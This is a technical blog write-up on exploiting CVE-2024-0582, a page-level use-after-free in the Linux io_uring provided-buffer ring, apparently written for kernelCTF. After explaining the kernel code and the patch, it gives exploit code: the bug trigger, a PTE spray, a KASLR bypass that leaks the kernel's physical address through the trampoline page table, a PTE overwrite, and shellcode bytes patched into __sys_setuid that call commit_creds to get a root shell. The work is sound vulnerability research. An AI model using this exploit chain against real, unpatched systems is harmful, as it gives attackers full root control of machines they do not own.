Analysis

IO_URING register

io_uring_setup: Create io_uring context, setup SQ queue and a CQ queue, return a file descriptor.
io_uring_register: Operate files or user buffers used for async I/O
io_uring_enter: Submit new I/O request

io_uring_register is defined as:

1 2	SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode, void __user *, arg, unsigned int, nr_args)

The core logic is at __io_uring_register, this CVE focuses on PBUF:

  static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
			       void __user *arg, unsigned nr_args)
	__releases(ctx->uring_lock)
	__acquires(ctx->uring_lock)
{
	int ret;
  ...

	switch (opcode) {
  ...
	case IORING_REGISTER_PBUF_RING:
		ret = -EINVAL;
		if (!arg || nr_args != 1)
			break;
		ret = io_register_pbuf_ring(ctx, arg);
		break;
	case IORING_UNREGISTER_PBUF_RING:
		ret = -EINVAL;
		if (!arg || nr_args != 1)
			break;
		ret = io_unregister_pbuf_ring(ctx, arg);
		break;
  ...
	default:
		ret = -EINVAL;
		break;
	}

	return ret;
}

Registration: IORING_REGISTER_PBUF_RING

io_register_pbuf_ring uses io_uring_buf_reg as the structor to read the registration data:

int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl, *free_bl = NULL;
	int ret;

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;
    ...
}

struct io_uring_buf_reg {
	__u64	ring_addr;
	__u32	ring_entries;
	__u16	bgid;
	__u16	flags;
	__u64	resv[3];
};

There are some conditions have to be passed before it allocates the new buffer:

if (!is_power_of_2(reg.ring_entries))
	return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
	return -EINVAL;

ring_entries is a number power of 2 and not greater than 65536

The list of pbuf(s) is stored at a io_buffer_list object. The req.flags must contain IOU_PBUF_RING_MMAP to reach the io_alloc_pbuf_ring which allocates a new buffer instead of pinning an exist buffer (io_pin_pbuf_ring).

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
	/* if mapped buffer ring OR classic exists, don't allow */
	if (bl->is_mapped || !list_empty(&bl->buf_list))
		return -EEXIST;
} else {
	free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
	if (!bl)
		return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
	ret = io_pin_pbuf_ring(&reg, bl);
else
	ret = io_alloc_pbuf_ring(&reg, bl);

io_alloc_pbuf_ring uses __get_free_pages which the order is around ring_size/0x1000:

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
			      struct io_buffer_list *bl)
{
	gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
	size_t ring_size;
	void *ptr;

	ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
	ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
	if (!ptr)
		return -ENOMEM;

	bl->buf_ring = ptr;
	bl->is_mapped = 1;
	bl->is_mmap = 1;
	return 0;
}

As we can see, the buf_ring = ptr is the continuous buffer of many io_uring_buf_ring objects.

With the defentions of io_buffer_list, io_uring_buf_ring and io_uring_buf:


struct io_buffer_list {
	/*
	 * If ->buf_nr_pages is set, then buf_pages/buf_ring are used. If not,
	 * then these are classic provided buffers and ->buf_list is used.
	 */
	union {
		struct list_head buf_list;
		struct {
			struct page **buf_pages;
			struct io_uring_buf_ring *buf_ring;
		};
	};
	__u16 bgid;

	/* below is for ring provided buffers */
	__u16 buf_nr_pages;
	__u16 nr_entries;
	__u16 head;
	__u16 mask;

	/* ring mapped provided buffers */
	__u8 is_mapped;
	/* ring mapped provided buffers, but mmap'ed by application */
	__u8 is_mmap;
};

struct io_uring_buf {
	__u64	addr;
	__u32	len;
	__u16	bid;
	__u16	resv;
};

struct io_uring_buf_ring {
	union {
		/*
		 * To avoid spilling into more pages than we need to, the
		 * ring tail is overlaid with the io_uring_buf->resv field.
		 */
		struct {
			__u64	resv1;
			__u32	resv2;
			__u16	resv3;
			__u16	tail;
		};
		__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
	};
};

I can create a graph to simplify how bl works:
alt text

Unregistration: IORING_UNREGISTER_PBUF_RING

int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_uring_buf_reg reg;
	struct io_buffer_list *bl;

	if (copy_from_user(&reg, arg, sizeof(reg)))
		return -EFAULT;
	if (reg.resv[0] || reg.resv[1] || reg.resv[2])
		return -EINVAL;
	if (reg.flags)
		return -EINVAL;

	bl = io_buffer_get_list(ctx, reg.bgid);
	if (!bl)
		return -ENOENT;
	if (!bl->is_mapped)
		return -EINVAL;

	__io_remove_buffers(ctx, bl, -1U);
	if (bl->bgid >= BGID_ARRAY) {
		xa_erase(&ctx->io_bl_xa, bl->bgid);
		kfree(bl);
	}
	return 0;
}

The io_unregister_pbuf_ring fucntion finds the io_buffer_list list via reg.bgid. After that, it will call __io_remove_buffers to remove the buffers:

static int __io_remove_buffers(struct io_ring_ctx *ctx,
			       struct io_buffer_list *bl, unsigned nbufs)
{
	unsigned i = 0;
	/* shouldn't happen */
	if (!nbufs)
		return 0;

	if (bl->is_mapped) {
		i = bl->buf_ring->tail - bl->head;
		if (bl->is_mmap) {
			folio_put(virt_to_folio(bl->buf_ring));
			bl->buf_ring = NULL;
			bl->is_mmap = 0;
		} else if (bl->buf_nr_pages) {
			...
		}
		/* make sure it's seen as empty */
		INIT_LIST_HEAD(&bl->buf_list);
		bl->is_mapped = 0;
		return i;
	}

	...

	return i;
}

Since bl->is_mapped is set to be 1 in io_alloc_pbuf_ring so __io_remove_buffers will call folio_put(virt_to_folio(bl->buf_ring)) to remove the buffers.

Since struct folio is used to handle many continuous struct page objects, so it is normal to treat bl->buf_ring as a folio.

Use: io_uring_mmap

To access the pbuf buffers on usermode, we can use io_uring_mmap.

io_uring_mmap is used as the mmap operation of io_uring fd:

static const struct file_operations io_uring_fops = {
	.release	= io_uring_release,
	.mmap		= io_uring_mmap,
#ifndef CONFIG_MMU
	.get_unmapped_area = io_uring_nommu_get_unmapped_area,
	.mmap_capabilities = io_uring_nommu_mmap_capabilities,
#else
	.get_unmapped_area = io_uring_mmu_get_unmapped_area,
#endif
	.poll		= io_uring_poll,
#ifdef CONFIG_PROC_FS
	.show_fdinfo	= io_uring_show_fdinfo,
#endif
};

In io_uring_mmap, it calls io_uring_validate_mmap_request to validate our request. Physical address of the returned buffer will be used to map the request virtual address:

static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
	size_t sz = vma->vm_end - vma->vm_start;
	unsigned long pfn;
	void *ptr;

	ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
	if (IS_ERR(ptr))
		return PTR_ERR(ptr);

	pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
	return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

To map the pbuf buffer, the request offset must contain IORING_OFF_PBUF_RING flag:

static void *io_uring_validate_mmap_request(struct file *file,
					    loff_t pgoff, size_t sz)
{
	struct io_ring_ctx *ctx = file->private_data;
	loff_t offset = pgoff << PAGE_SHIFT;
	struct page *page;
	void *ptr;

	switch (offset & IORING_OFF_MMAP_MASK) {
	...
	case IORING_OFF_PBUF_RING: {
		unsigned int bgid;

		bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
		mutex_lock(&ctx->uring_lock);
		ptr = io_pbuf_get_address(ctx, bgid);
		mutex_unlock(&ctx->uring_lock);
		if (!ptr)
			return ERR_PTR(-EINVAL);
		break;
		}
	default:
		return ERR_PTR(-EINVAL);
	}

	page = virt_to_head_page(ptr);
	if (sz > page_size(page))
		return ERR_PTR(-EINVAL);

	return ptr;
}

From this, we can create a usermode function to allocate and user pbuf buffers:

void *register_pbuf(struct io_uring *ring, u32 ring_entries, u32 flags,
                    u32 bgid) {
  struct io_uring_buf_reg buf_reg = {
      .ring_entries = ring_entries,
      .ring_addr = 0,
      .bgid = bgid,
      .flags = flags,
      .resv = {0, 0, 0},
  };

  int ret = SAFE(io_uring_register_buf_ring(ring, &buf_reg, 0));
  off64_t offset = IORING_OFF_PBUF_RING | (uint64_t)bgid
                                              << IORING_OFF_PBUF_SHIFT;
  /*
        loff_t offset = pgoff << PAGE_SHIFT;
        struct page *page;
        void *ptr;

        switch (offset & IORING_OFF_MMAP_MASK)
        ...
          case IORING_OFF_PBUF_RING: {
                unsigned int bgid;
                bgid = (offset & ~IORING_OFF_MMAP_MASK) >>
     IORING_OFF_PBUF_SHIFT;
*/
  void *addr = mmap(NULL, (buf_reg.ring_entries) * sizeof(struct io_uring_buf),
                    PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
                    ring->ring_fd, offset);
  if (addr == MAP_FAILED) {
    perror("mmap");
  }
  return addr;
}

The bug

We can see in the io_unregister_pbuf_ring function, there is no check if the pbuf buffer is mapping to any usermode addresses. Taking advantages from this, attacker can still access to the pbuf buffer via mmap even the buffer is freed which casues use-after-free (exactly on the page level).

The patch

Readint the commit, we can summarize the patch:

Add new attribute to hande buf list:


diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index d3009d56af0ba3..805bb635cdf558 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -340,6 +340,9 @@ struct io_ring_ctx {
 
 	struct list_head	io_buffers_cache;
 
+	/* deferred free list, protected by ->uring_lock */
+	struct hlist_head	io_buf_list;

No deleting the buffers on the __io_remove_buffers, let io_kbuf_mmap_list_free do that:

diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index e40b1143821045..3a216f0744dd66 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
...
@@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
 		ctx->mm_account = NULL;
 	}
 	io_rings_free(ctx);
+	io_kbuf_mmap_list_free(ctx);
 
 	percpu_ref_exit(&ctx->refs);
 	free_uid(ctx->user);

diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index a1e4239c7d75d1..85e680fc74ce2c 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -33,6 +33,11 @@ struct io_provide_buf {
 	__u16				bid;
 };
 
+struct io_buf_free {
+	struct hlist_node		list;
+	void				*mem;
+};
+
 static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
 							unsigned int bgid)
 {
@@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
 	if (bl->is_mapped) {
 		i = bl->buf_ring->tail - bl->head;
 		if (bl->is_mmap) {
-			folio_put(virt_to_folio(bl->buf_ring));
+			/*
+			 * io_kbuf_list_free() will free the page(s) at
+			 * ->release() time.
+			 */
 			bl->buf_ring = NULL;
 			bl->is_mmap = 0;
 		} else if (bl->buf_nr_pages) {
@@ -531,18 +539,28 @@ error_unpin:
 	return -EINVAL;
 }
...
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
+{
+	struct io_buf_free *ibf;
+	struct hlist_node *tmp;
+
+	hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
+		hlist_del(&ibf->list);
+		io_mem_free(ibf->mem);
+		kfree(ibf);
+	}
+}

Exploit

Trigger the bug

Just allocating a lot of pbuf buffers, referencing them via mmap and unregister them:

#define ENTRIES 4
#define PAGE_SIZE 0x1000

void *register_pbuf(struct io_uring *ring, u32 ring_entries, u32 flags,
                    u32 bgid) {
  struct io_uring_buf_reg buf_reg = {
      .ring_entries = ring_entries,
      .ring_addr = 0,
      .bgid = bgid,
      .flags = flags,
      .resv = {0, 0, 0},
  };

  int ret = SAFE(io_uring_register_buf_ring(ring, &buf_reg, 0));
  off64_t offset = IORING_OFF_PBUF_RING | (uint64_t)bgid
                                              << IORING_OFF_PBUF_SHIFT;
  /*
        loff_t offset = pgoff << PAGE_SHIFT;
        struct page *page;
        void *ptr;

        switch (offset & IORING_OFF_MMAP_MASK)
        ...
          case IORING_OFF_PBUF_RING: {
                unsigned int bgid;
                bgid = (offset & ~IORING_OFF_MMAP_MASK) >>
     IORING_OFF_PBUF_SHIFT;
*/
  void *addr = mmap(NULL, (buf_reg.ring_entries) * sizeof(struct io_uring_buf),
                    PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
                    ring->ring_fd, offset);
  if (addr == MAP_FAILED) {
    perror("mmap");
  }
  return addr;
}

#define NR_PAGES 0x80
#define PIPE_NR 0x50
#define PAGE_NR 0x100
void *pages[PAGE_NR];

int main(int argc, char **argv, char **envp) {
  struct io_uring ring;
  pin_cpu(0);

  SAFE(io_uring_queue_init(ENTRIES, &ring, 0));

  logInfo("%d", ring.ring_fd);
  void **laddrs = calloc(NR_PAGES, sizeof(char *));

  for (uint i = 0; i < NR_PAGES; ++i) {
    laddrs[i] = register_pbuf(&ring, PAGE_SIZE / sizeof(struct io_uring_buf),
                              IOU_PBUF_RING_MMAP, i);
    logInfo("%p", laddrs[i]);
  }

  for (uint i = 0; i < NR_PAGES; ++i) {
    int ret = SAFE(io_uring_unregister_buf_ring(&ring, i));
  }
  ...
}

Up to now, many addresses in laddrs are freed but still can be accessed.

Spray PTE

To achive a PTE ( Page Table Entry) stored in an UAF page, we can call mmap many times:

...
  for (uint i = 0; i < PAGE_NR; ++i) {
    pages[i] = mmap((void *)0x13370000 + 0x10 * PAGE_SIZE * i, PAGE_SIZE,
                    PROT_READ | PROT_WRITE,
                    MAP_ANON | MAP_SHARED | MAP_FIXED_NOREPLACE, -1, 0);
    if (pages[i] == MAP_FAILED) {
      logErr("mmap");
      break;
    }
    mlock(pages[i], PAGE_SIZE);
    memset(pages[i], 0x41, 0x10);
  }
...

To make sure if there is any PTE on the laddrs list, we have to know how a PTE value looks like.

I use my custom script to get PTE from a virtual address:

alt text

To know why PTE has that value, you can refer this paper.

We can write a filter to get the possible PTE:

#define _PAGE_BIT_PRESENT 0
#define _PAGE_BIT_RW 1
#define _PAGE_BIT_USER 2
#define _PAGE_BIT_ACCESSED 5
#define _PAGE_BIT_DIRTY 6
#define _PAGE_BIT_NX 63

#define _PAGE_PRESENT (1UL << _PAGE_BIT_PRESENT)
#define _PAGE_RW (1UL << _PAGE_BIT_RW)
#define _PAGE_USER (1UL << _PAGE_BIT_USER)
#define _PAGE_ACCESSED (1UL << _PAGE_BIT_ACCESSED)
#define _PAGE_DIRTY (1UL << _PAGE_BIT_DIRTY)
#define _PAGE_NX (1UL << _PAGE_BIT_NX)

  for (uint i = 0; i < NR_PAGES; ++i) {
    int PTE = *(int *)laddrs[i];
    if ((PTE & _PAGE_PRESENT) && (PTE & _PAGE_RW) && (PTE & _PAGE_USER)) {
      logInfo("PTE: %p", laddrs[i]);
     while(1){
      ; // Using to reference on debugger
     }
    }
  }

As we can see, I have a PTE of the page which has the virtual address 0x14200000:

alt text

Finding the physical address of the kernel

kAlsr also randomizes the physical address of the kernel, so we have to find the way to get it if we want to change kernel’s text.

If you want just know the technique, just read this blog. From now, I want to explain the detial why the author can find those magic numbers.

There are two conditions for the physical address we want to find:

It is fixed, no matter if kASLR is enable or not
It must contain the data related to kernel’s physical address, maybe PTE or another address that fixed with kernel’s physical address.

After knowing where the kernel chooses the random address of it, I want to check what it will do after that.

I backtraced which function calls find_random_phys_addr, and this is the result I found:

extract_kernel -> choose_random_location -> find_random_phys_addr.

After extracting kernel successfully, it will jump the entry of kernel:

	call	extract_kernel		/* returns kernel entry point in %rax */

/*
 * Jump to the decompressed kernel.
 */
	movq	%r15, %rsi
	jmp	*%rax
SYM_FUNC_END(.Lrelocated)

setup_arch

This function is called from start_kernel, I chose this funcion because it calls many interested functions like kernel_randomize_memory, early_alloc_pgt_buf, reserve_brk, reserve_real_mode, and init_mem_mapping. These function may be helpful for me to find which fixed physical addresses contain the data related to kernel’s physical address.

void __init setup_arch(char **cmdline_p)
{

	...
	early_reserve_memory();

	...
	kernel_randomize_memory();

        ...

	early_alloc_pgt_buf();

	/*
	 * Need to conclude brk, before e820__memblock_setup()
	 * it could use memblock_find_in_range, could overlap with
	 * brk area.
	 */
	reserve_brk();

  ...

  x86_platform.realmode_reserve();
  init_mem_mapping();

	...
}

kernel_randomize_memory

This function is used for changing well-known virtual addresses like page_offset_base, vmalloc_base, and vmemmap_base:

static __initdata struct kaslr_memory_region {
	unsigned long *base;
	unsigned long size_tb;
} kaslr_regions[] = {
	{ &page_offset_base, 0 },
	{ &vmalloc_base, 0 },
	{ &vmemmap_base, 0 },
};

/* Get size in bytes used by the memory region */
static inline unsigned long get_padding(struct kaslr_memory_region *region)
{
	return (region->size_tb << TB_SHIFT);
}

/* Initialize base and padding for each memory region randomized with KASLR */
void __init kernel_randomize_memory(void)
{
	size_t i;
	unsigned long vaddr_start, vaddr;
	unsigned long rand, memory_tb;
	struct rnd_state rand_state;
	unsigned long remain_entropy;
	unsigned long vmemmap_size;

	vaddr_start = pgtable_l5_enabled() ? __PAGE_OFFSET_BASE_L5 :
					     __PAGE_OFFSET_BASE_L4;
	vaddr = vaddr_start;
...
	prandom_seed_state(&rand_state, kaslr_get_random_long("Memory"));

	for (i = 0; i < ARRAY_SIZE(kaslr_regions); i++) {
		unsigned long entropy;

		/*
		 * Select a random virtual address using the extra entropy
		 * available.
		 */
		entropy = remain_entropy / (ARRAY_SIZE(kaslr_regions) - i);
		prandom_bytes_state(&rand_state, &rand, sizeof(rand));
		entropy = (rand % (entropy + 1)) & PUD_MASK;
		vaddr += entropy;
		*kaslr_regions[i].base = vaddr;

		printk("Address from 0x%lx to 0x%lx", vaddr - entropy, vaddr);

...
	}
}

early_alloc_pgt_buf

In early_alloc_pgt_buf, I added some printk line to get the more details about what does this function do, since if kASLR is enable, it is hard to debug with gdb.

void __init early_alloc_pgt_buf(void)
{
	unsigned long tables = INIT_PGT_BUF_SIZE;
	phys_addr_t base;

	printk("text_base = 0x%lx", __pa(_text));
	printk("brk_base = 0x%lx", __pa(__brk_base));

	base = __pa(extend_brk(tables, PAGE_SIZE));

	pgt_buf_start = base >> PAGE_SHIFT;
	pgt_buf_end = pgt_buf_start;
	pgt_buf_top = pgt_buf_start + (tables >> PAGE_SHIFT);
	printk("pgt_buf_end = 0x%lx", pgt_buf_end << PAGE_SHIFT);
}

We can see that it extend 0x1000 bytes for pgt_buf_end. From the function’s decription, I can know that the new page is used for the page table for [0, 0x100000] physical address.

alt text

realmode_reserve

This function is used for allocating buffer for real_mode (Linux uses global real_mode_header var to save the address):

void __init reserve_real_mode(void)
{
	phys_addr_t mem;
	size_t size = real_mode_size_needed();

	if (!size)
		return;

	WARN_ON(slab_is_available());

	/* Has to be under 1M so we can execute real-mode AP code. */
	mem = memblock_phys_alloc_range(size, PAGE_SIZE, 0, 1 << 20);
	printk("real_mode = 0x%lx (phys)\n", mem); // I added this
	if (!mem)
		pr_info("No sub-1M memory is available for the trampoline\n");
	else
		set_real_mode_mem(mem);

	/*
	 * Unconditionally reserve the entire fisrt 1M, see comment in
	 * setup_arch().
	 */
	memblock_reserve(0, SZ_1M);
}

The mem‘s value should be fixed and no greater than 0x100000.

I have added a printk line to print its value, found that it always equals to 0x98000.

init_mem_mapping

This fucntion is used to mapping physical [0, 0x100000] and also init trampoline.

void __init init_mem_mapping(void)
{
	unsigned long end;

	pti_check_boottime_disable();
	probe_page_size_mask();
	setup_pcid();

#ifdef CONFIG_X86_64
	end = max_pfn << PAGE_SHIFT;
#else
	end = max_low_pfn << PAGE_SHIFT;
#endif

	/* the ISA range is always mapped regardless of memory holes */
	init_memory_mapping(0, ISA_END_ADDRESS, PAGE_KERNEL);

	/* Init the trampoline, possibly with KASLR memory offset */
	init_trampoline();

	...
}

As I said on early_alloc_pgt_buf, the page [brk_base, brk_base+0x1000] will be used for mapping [0, 0x100000]. Let deep dine to init_memory_mapping to check whether it will be used [brk_base, brk_base+0x1000] page or not.

init_memory_mapping

This is the stack call to code that init the page table for [0, 0x100000]:

init_memory_mapping
-> kernel_physical_mapping_init
-> __kernel_physical_mapping_init

In function __kernel_physical_mapping_init, the pgd value is from:

1	pgd_t *pgd = pgd_offset_k(vaddr);

In this case, vaddr=_page_offset_base because paddr_start=0.
To determine value of pgd, I have to find the defenition of pgd_offset_k:

#ifndef pgd_offset_k
#define pgd_offset_k(address)		pgd_offset(&init_mm, (address))
#endif

#ifndef pgd_offset
#define pgd_offset(mm, address)		pgd_offset_pgd((mm)->pgd, (address))
#endif

static inline pgd_t *pgd_offset_pgd(pgd_t *pgd, unsigned long address)
{
	return (pgd + pgd_index(address));
};

#ifndef pgd_index
/* Must be a compile-time constant, so implement it as a macro */
#define pgd_index(a)  (((a) >> PGDIR_SHIFT) & (PTRS_PER_PGD - 1))
#endif

struct mm_struct init_mm = {
	.mm_mt		= MTREE_INIT_EXT(mm_mt, MM_MT_FLAGS, init_mm.mmap_lock),
	.pgd		= swapper_pg_dir,
	.mm_users	= ATOMIC_INIT(2),
	.mm_count	= ATOMIC_INIT(1),
	.write_protect_seq = SEQCNT_ZERO(init_mm.write_protect_seq),
	MMAP_LOCK_INITIALIZER(init_mm)
	.page_table_lock =  __SPIN_LOCK_UNLOCKED(init_mm.page_table_lock),
	.arg_lock	=  __SPIN_LOCK_UNLOCKED(init_mm.arg_lock),
	.mmlist		= LIST_HEAD_INIT(init_mm.mmlist),
#ifdef CONFIG_PER_VMA_LOCK
	.mm_lock_seq	= 0,
#endif
	.user_ns	= &init_user_ns,
	.cpu_bitmap	= CPU_BITS_NONE,
#ifdef CONFIG_IOMMU_SVA
	.pasid		= IOMMU_PASID_INVALID,
#endif
	INIT_MM_CONTEXT(init_mm)
};

extern pgd_t init_top_pgt[];

#define swapper_pg_dir init_top_pgt

In short,

1	pgd = init_top_pgt + ((_page_offset_base >> 39) & (512-1))*4

so pgd’s address is fixed with the kernel’s address.

After that, the function uses alloc_low_page to allocate memory for p4d:

1	p4d = alloc_low_page();

p4d is at pgt_buf_end+0x1000:

alt text

__ref void *alloc_low_pages(unsigned int num)
{
	unsigned long pfn;
	int i;

	if (after_bootmem) {
	...
	}

	if ((pgt_buf_end + num) > pgt_buf_top || !can_use_brk_pgt) {
		...
	} else {
		pfn = pgt_buf_end;
		pgt_buf_end += num;
	}

	for (i = 0; i < num; i++) {
		....
	}

	return __va(pfn << PAGE_SHIFT);
}

p4d = (pgt_buf_end) << PAGE_SHIFT

setup p4d as level-3 paging for [0; 0x1000].

1 2	paddr_last = phys_p4d_init(p4d, __pa(vaddr), __pa(vaddr_end), page_size_mask, prot, init);

and saved the p4d to pgd:

1 2	p4d_populate_init(&init_mm, p4d_offset(pgd, vaddr), (pud_t *)p4d, init);

alt text

-> level-4 paging for [0; 0x1000]

alt text

init_trampoline

static void __init init_trampoline(void)
{
#ifdef CONFIG_X86_64
	/*
	 * The code below will alias kernel page-tables in the user-range of the
	 * address space, including the Global bit. So global TLB entries will
	 * be created when using the trampoline page-table.
	 */
	if (!kaslr_memory_enabled())
		trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)];
	else
		init_trampoline_kaslr();
#endif
}

trampoline_pgd_entry equals to p4d value

void __meminit init_trampoline_kaslr(void)
{
	pud_t *pud_page_tramp, *pud, *pud_tramp;
	p4d_t *p4d_page_tramp, *p4d, *p4d_tramp;
	unsigned long paddr, vaddr;
	pgd_t *pgd;

	pud_page_tramp = alloc_low_page();

	/*
	 * There are two mappings for the low 1MB area, the direct mapping
	 * and the 1:1 mapping for the real mode trampoline:
	 *
	 * Direct mapping: virt_addr = phys_addr + PAGE_OFFSET
	 * 1:1 mapping:    virt_addr = phys_addr
	 */
	paddr = 0;
	vaddr = (unsigned long)__va(paddr); // PAGE_OFFSET
	pgd = pgd_offset_k(vaddr);

	p4d = p4d_offset(pgd, vaddr);
	pud = pud_offset(p4d, vaddr);

	pud_tramp = pud_page_tramp + pud_index(paddr);//
	*pud_tramp = *pud;

	if (pgtable_l5_enabled()) {
		...
	} else {
		trampoline_pgd_entry =
			__pgd(_KERNPG_TABLE | __pa(pud_page_tramp));
	}
}

… or p4d‘s value + 0x3000 ( because allocated 2 pages for PDE and PTE)

Summary:

alt text

Now, I just need to find if trampoline_pgd_entry‘s value can be saved in [0x0; 0x100000] physical address.

setup_real_mode

The real_mode_headers is always at 0x98000

In setup_real_mode, I can see it stores trampoline_pgd_entry in real_mode_header->trampoline_pgd:

static void __init setup_real_mode(void)
{
	...

	base = (unsigned char *)real_mode_header;

	...
	memcpy(base, real_mode_blob, size);

	...
	trampoline_pgd = (u64 *) __va(real_mode_header->trampoline_pgd);

	/* Map the real mode stub as virtual == physical */
	trampoline_pgd[0] = trampoline_pgd_entry.pgd;

	/*
	 * Include the entirety of the kernel mapping into the trampoline
	 * PGD.  This way, all mappings present in the normal kernel page
	 * tables are usable while running on trampoline_pgd.
	 */
	for (i = pgd_index(__PAGE_OFFSET); i < PTRS_PER_PGD; i++)
		trampoline_pgd[i] = init_top_pgt[i].pgd;
	...
}

After some relocations, I can see trampoline_pgd‘s physical address is 0x9c000:

pwndbg> p/x *real_mode_header
$18 = {
  text_start = 0x99000,
  ro_end = 0x9a204,
  trampoline_start = 0x99000,
  trampoline_header = 0x9d000,
  sev_es_trampoline_start = 0x99050,
  trampoline_start64 = 0x9a1f0,
  trampoline_pgd = 0x9c000,
  wakeup_start = 0x99200,
  wakeup_header = 0x9b010,
  machine_real_restart_asm = 0x9a190,
  machine_real_restart_seg = 0x8
}

That means, we can use 0x9c000 physical address to leak trampoline_pgd_entry. Depending on whether kALSR is enable or not, we can calculate __brk_base‘s address and also kernel’s address!

Final graph:

alt text

Leak kernel’s address and overwriting code

Overwritting victim’s PTE to make its address become 0x9c000, read the victim page and leaking kernel’s physical address:

*pte = 0x800000000009c067;
  u64 addr = -1;
  void *target = NULL;
  for (uint i = 0; i < PAGE_NR; ++i) {
    addr = *(u64 *)pages[i];
    if (addr != 0x4141414141414141) {
      target = pages[i];
      logErr("victim = %p", target);
      break;
    }
  }

  addr = addr & (~0xffULL);
#define KASLR 1
  u64 physkBase = addr - 0x3e00000 - 0x1000;
  if (KASLR)
    physkBase -= 0x3000;

  logInfo("physkBase: 0x%lx", physkBase);

alt text

After that, I wrote a small shellcode to __sys_setuid, which call commit_creds(&init_cred):

lea rcx, [rip-7]
lea rdi, [rcx+0x2a75be0]
lea r10, [rcx+0x1ca30]
call r10
ret

*pte = (physkBase + 0x1f8000) | 0x8000000000000067;
 memcpy(target + 0x360,
        "\x48\x8D\x0D\xF9\xFF\xFF\xFF\x48\x8D\xB9\xE0\x5B\xA7\x02\x4C\x8D\x91"
        "\x30\xCA\x01\x00\x41\xFF\xD2\xC3",
        26);
 if (setuid(0) == 0) {
   system("mount -t devtmpfs devtmpfs /dev ; cat /dev/vdb ; bash");
 }

In kernelCTF platform, I can use trick mount devtmpfs instead of escaping container.
alt text

Final words

This is my research about DirtyPageTable technique with CVE-2024-0582.

If you want to learn more about the CVE, you can check this excellent blog:
https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/

The leaking kernel physical address trick has the credit to shift_crops and ptr-yudai. Since no one of them explains the details why those magic number exist, this blog is written as result of my quriosity.

LOL, @shift_crops follows me back on X but did not reply my messages. So plz reply my messages if you see this blog, @shift_crops :(.
alt text

I’m still new in Linux kernel exploitation. Plz let me know if you see something wrong on this blog.

Cheers./